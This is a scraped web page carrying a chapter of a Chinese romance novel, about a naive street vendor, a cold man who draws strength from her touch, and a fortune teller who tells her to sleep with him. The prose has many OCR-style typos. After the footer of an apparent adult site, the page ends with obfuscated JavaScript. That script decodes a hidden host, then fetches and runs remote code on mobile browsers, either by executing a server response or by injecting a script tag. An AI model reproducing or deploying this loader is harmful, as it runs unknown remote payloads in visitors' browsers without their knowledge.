「喂,你要不要跟我去摆地摊啊?」萧融融跑到黑耀岩身旁坐下,非常有兴致地问着他。

黑耀岩唯一所做的,就是把报纸拿高,拒看她那张虽蠢但是却过分美丽的脸庞。

「我问你话,你怎么不回话?」萧融融直接抢下报纸。「你难道不知道这样是很没有礼貌的吗?」

「对你不需要有礼貌。」黑耀岩淡淡抬眸看她,冷冷地说道,不想给这个女人太多好脸色看。

本以为这女人可能会发火或是知难而退的,没想到她居然露出了一个亮灿灿的笑容。

「听你这样说,好像我们愈来愈像—家人了耶!」萧融融笑吟吟地说道。「像小曼和千丝她们,也说对我不需要有礼貌,尤其是小曼,她总是对我吼来吼去,一点礼貌都没有!」

她在那里高兴个什么劲?「我可没有跟笨女人成为一家人的兴致。」黑耀岩差点迷眩在她那太过灿烂的笑颜里。

他妈的,这白痴女人笑起来还真不是普通的好看。

「你好腼觍喔!」瞧他说得那么冷淡,他一定是很害羞。「你明明很想跟我成为一家人,就要说实话!故意说我是笨女人,是改变不了事实的。」

「谁想跟你成为一家人了?」这女人是在想什么?老天,肝火一动,那昏眩的感觉居然在此时又起。

「你啊。」萧融融想到就乐。「你总是会三不五时赖到我身上来,你以为我不晓得那是你想跟我表示亲近的举动吗?」

说实话,她好喜欢和这个高大威猛的男人亲近的感觉喔!在她和他紧贴在一起时,总会有种即使全天下的妖魔鬼怪出现,也不足惧的奇妙感觉。

愈来愈昏,也愈来愈熟了。「谁想跟你亲近?」该死,他为什么被迫要跟这女人亲近?

「你都不晓得吗?除了你之外,还有很多东西都想跟我亲近耶!」萧融融完全没发现他的异样,也把他的反驳误以为那是他的问题。「比较正派的就像是杜鹃、杜甫、肚子痛啊!它们都很喜欢赖到我身上来,你不晓得吗?比较不正派的……」

咚!黑耀岩恰巧在此时瘫软在她身上。

「别把我跟狗相较。」黑耀岩冷着一张俊颜,有气无力地说道。很好,贴着她,他感觉到全身流失的力气又开始回复了。

「呵,你果然很喜欢跟我亲近嘛!」萧融融以纤纤柔荑顺着他那乌黑的发丝,开心地说道。

白痴。黑耀岩在心里咒道。不过,这白痴的手还真是软得不可思议,他甚至有些迷上它的温度……

「不过,你的脸色怎么好像有一点苍白?」萧融融近距离地看他,总算发现他的不对劲了。

黑耀岩紧闭双唇,懒得回她。她完全都没有发现他刚刚很痛苦吗?是他伪装得太好,还是她太蠢?

「你是不是很不舒服,怎么不说话了?」萧融融看着他全然不语的模样,忧心满面。

好了。他已经完全恢复了。「我是不舒服,扶我回房休息。」只要能赶快摆脱这个女人,重获宁静就好。

「好。」萧融融对他那命令示的口吻完全不以为意。「对了,我好像忘记跟你聊聊你以前的人生耶!你好像满擅长命令人的吼。」

「我没兴趣聊我以前的事。」黑耀岩伪装出一副虚弱的模样。「我现在很不舒服。」

「没兴趣,难道你以前很惨吗?」萧融融本想继续问下去,突地想到了他现在身体不适。「啊,我先扶你回房间。」

她小心翼翼地扶起坐在沙发上的他,非常认真地扶着他一步一步地走回他的房间。

黑耀岩被她以病人的角色看待着,感觉着她那笨拙的举动,内心竟然被她给融化了一小角。

萧融融将他安置好在床上之后,还仔仔细细地为他盖上被子。「对了,你要不要我留下来陪你?我可以不用去摆地摊。」

总觉得要留他一个人孤单在家,怪可怜的。

「不用了,我老毛病,睡个觉就奸了。」黑耀岩发觉自己居然没有办法冷脸对她。

「那我先去摆地摊了,你要好好休息喔!」萧融融不放心地交代着。「真可惜没有办法让你跟我去摆地摊,没办法让你知道摆地摊有多好玩。」

才被她感动一下,他又开始觉得她真是蠢到极点了!什么可惜?他一点都不觉得可惜。

懒得理她的黑耀岩,生怕她又开始碎碎念一堆有的没有的,没完没了,干脆假寐起来。

要他跟她去摆地摊?门儿都没有!

「一件两百,三件五百,随便挑喔!」萧融融面前摆着一大堆的胸衣,喊得正开心。

「小姐,我要这些。」一位妇人选好了,正在跟萧融融买单。「你帮我把它包起来。」

「好的。」萧融融摆出客客气气的笑容,帮客人把胸衣都放进塑胶袋中。「喏,一共五百元。」

「小姐?」萧融融看着原来要跟她买的妇人一脸惊慌地跑掉。「你不是说要买吗?」

怎么突然间一句话都不说就跑得不见人影了呢?

「奇怪。」萧融融纳闷地踮起脚尖想要看个清楚,却望见了几位凶神恶煞堵在她的摊子前。

「光生,你们要帮你们的谁买胸衣啊?」虽然心里明白来者不善,萧融融却还漾着笑,以不变应万变。「我可以帮你们挑款式喔!」

「小姐,看来你的生意很不错嘛!」为首的男子一脸矫情的笑容。「不过要是有人存心来搞破坏,可就不好了。」

表面上还漾苦笑,萧融融已开始收拾起她的货品。「不会啦,现在的人心地都很好,除非被条子抓,不然没有人会来破坏我的摊子啦!」

「是吗?」为首的男子笑苦摇头。「要不要打个商量,你一个月付我们—些钱,我们包你生意做得平平稳稳的!」

果然是来收保护费的。「不用了。」萧融融收拾的动作愈来愈快。「我现在生意也做得好好的。」

「小姐,你不懂我们的意思吗?」为首的男子听萧融融这么说,脸色愈变愈难看。「想要在这里继续摆摊子,就得捐些银而,让我们罩你。」

「银雨?」萧融融故意装傻。「中华民国好像已经没有银两这玩意了,我要捐怕也掏不出来耶!」她笑得很无辜。

「你不要敬酒不吃吃罚酒!」为首的男子出言恫喝地。

「敬酒跟罚酒有什么差别吗?」萧融融已顺利地打包好她全部的货品。「不都一样是酒?我滴酒不沾耶,不好意思。」她一脸抱歉,准备看好时机,拔腿就跑。

「你——」为首的男子被她气到变睑。「兄弟们,上!」他喝令身边一群男子。

见情势不对,萧融融疯狂地展开她的逃命计书,东奔西窜,不时还回头望一下还有几个人在狂追自己。

「好像跑得不会很快嘛!」萧融融暗笑,想到那随便走走都比这些男人快的黑耀岩,唇边绽出笑容来。「还是他跑得比较快,追都追不上。」

想他想得太入神,萧融融猛一回神时,已直直撞上眼前另一个摊子。「啊——」

「对不起,我在躲追杀。」萧融融唇边绽出一抹道歉的笑容。「我帮你弄好一下你的摊子,然后我要继续跑。」

啊,铁口直断,这人是算命师父啊。萧融融一边手忙脚乱地帮被她弄翻摊子的人收拾东西,一边想道。

「小姐,你别跑。」黑衣算命师留人了。

「可是有人在追杀我啊,虽然他们可能也撞到别的摊子,正混乱成一团,但是我还是得跑,免得被迫到,我就呜呼哀哉了。」萧融融火速地将他的摊子恢复原状。

「他们不会追列你,你也不会呜呼哀哉的,你放心。」黑衣算命师露出诡谲的笑容。

「是真的吗?」萧融融半信半疑,想到自己正面对一个算命师,也许对方说的话真的有几分可信度。

「是真的。」黑衣算命师微微浅笑着。「已经收好了,你就坐下来,让我告诉你一些事吧!」

「啊?」萧融融指了指自己的鼻尖。「你要帮我算命吗?」

「是啊,你撞到我的摊子,算是我俩有缘,我刚刚已经从你的面相看出你最近的一些事情了。」黑衣算命师一脸神秘貌。「就让我免费为你算算命吧!」他露出善意的微笑。

「喔,好啊。」反正免钱的,不算白不算。「你说你刚刚已经看了我的面相了?」萧融融在黑衣算命师前落坐下来。

「是啊。」黑衣算命师点了点头。「我说一说,信不信由你。」

「好。」听起来好像很玄的样子,不过那些人真的没有追上来耶,也许她真的可以相信这算命师也说不定。

「你很怕鬼,非常非常怕鬼。」黑衣算命师一开始就点明了萧融融生平最惧之物。

「嗯,我是很怕鬼没错。」萧融融还不觉得他会说出这话有什么稀奇,反正天底下相信有鬼的人大概一半以上都怕这玩意儿,只是她怕的程度可能特别强烈而已。

「你也一直在找能让自己不怕鬼或是不会遇到鬼的方法,对不对?」黑衣算命师又是一脸微笑。

「对。」萧融融再度点头,对算命师的推测还是不觉神奇。「你这样问,是有什么方法可以让我避鬼吗?」

「没错。」算命师点点头,唇边漾着吊诡的笑。

萧融融防备心顿起。「我跟你说喔,你千万不要叫我捐什么五十万一百万让你替我改命格之类的,还是什么要替我摸骨,好让我转运喔!电视上演这种算命骗人的戏码可多了,你要是这样说的话,我可不会信你的。」

「我没有你想的那么邪恶。」只不过是另有所图罢了。「事实上,能让你这辈子都不会遇到鬼的人正在你身边,只是你没有善用而已。」

「你这话什么意思?」萧融融眨了眨眼。「在我身边的,不就是你吗?你这样说来说去,还不是要我的钱或是我的人?」

唉,她好像遇到一个无三小路用的江湖骗子了。

「你又误会了。」黑衣算命师摇了摇头,浅浅笑菩。「我指的身边,是你朝夕相处的人。」

「啊?我朝夕相处的人?」萧融融这下可惊讶了。「你指的是谁?」

黑衣算命师缓缓开口:「数日前飞进你家的男子。」

黑衣算命师此语一出,萧融融立刻脸色大变。「你怎么知道数日前有男子飞进我家?」

「我是算命师啊。」黑衣算命师给了萧融融一个最简单的答案。「我还知道,你一开始一定觉得他不是人。」

「啊?!」他怎么都知道得一清二楚?萧融融目瞪口呆地望着他。「你该不会连他那一天晚上对我……对我……对我……」她芙颊一红,登时不知道该如何接下去。

「我全都知道。」黑衣算命师再度点了点头。「从你的面相我都可以看得出来。」

「啊!」老天,这算命师也太厉害了吧?「那那那……那……你说他可以让我永远不会遇到鬼?」

「想到这算命师知道那天晚上发生的所有事情,萧融融就害羞地飞快转移话题。

「对。」黑衣算命师点了点头。

「那我要怎么做?」萧融融飞快地问道,巴不得马上知道答案,然后同家快点依算命师所言行事。

「只要让他破了你的处女之身,你就可以一辈子部不会遇上鬼。」黑衣算命师娓娓道出办法。「不但如此,他那相当容易被附身的超灵力体质,也会因此而改变……」

萧融融倒抽一口气。「啊?你知道我是……」

天哪,这算命师也太猛了,居然从她的脸可以看出她是处女?有很多男人小是跟女人做来做去都还搞不清楚女人是不是处女?如果这个算命师愿意的话,那很多做过处女膜缝补手术的女人不就都无所遁形了?这实在是太可怕了!

「你以为我算命师当假的吗?」黑衣算命师脸上浮出自负的笑容。「铁口直断这四字可不是写着好玩的。」

「可是你真的也太灵了,你为什么不去电视上帮人家算命啊?那你一定很快就走红天下,然后就可以发一笔大财,也就不需要在这里摆摊子了啊。」萧融融已经在帮算命师做前程规画了。

「我只算有缘人,就像你。」黑衣算命师对着萧融融微笑。「你回去就照着我的话做吧。」

「好好好。」萧融融猛点头。「我一定会照办的,对了,你都在这里摆摊子吗?」

她已经在打算,若是事情真的能够成功的话,她要回来好好感谢他。

「不,我居无定所,云游四海。」黑衣算命师笑着起身。「你别徒费力气找找,若是有缘,我们自会再相见。」

他跨出的步子随着他叶山的一字一句而渐渐加大。

「啊?」萧融融望着黑衣算命师丢下摊子不顾,迳自走人的行径,连忙着急地嚷道:「你的摊子小要了吗?」

黑衣算命师没行回头,已然离地愈来愈远。

「果然不太在意钱,连摊子都可以弃之不顾。」萧融融喃喃道。「早知道刚刚就不用人认真帮他收拾摊子了。」

恶男的情宠2你必定对我下了情咒教我在辽阔宇宙中只为追求你的真爱前进

评分
相关推荐
3.0分

3.0分 小姐的男宠379

3.0分

3.0分 武则天的男宠们a1a

3.0分

3.0分 骄宠男人宝贝的妙技!970

3.0分

3.0分 诱宠萝莉小情人(1-11集)ddb

3.0分

3.0分 宠爱的儿子8f2

3.0分

3.0分 魔女的宠幸2cd

3.0分

3.0分 宠溺的女儿5f0

3.0分

3.0分 偷情男女被恶魔逮着355

3.0分

3.0分 老师们的宠物cb4

3.0分

3.0分 老师们的宠物cb4

3.0分

3.0分 宠我的漂亮妈妈f09

3.0分

3.0分 宠我的漂亮妈妈f09

3.0分

3.0分 美女宠物4f5

3.0分

3.0分 美女宠物4f5

3.0分

3.0分 后宫宠爱61d

3.0分

3.0分 专宠奴心816


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};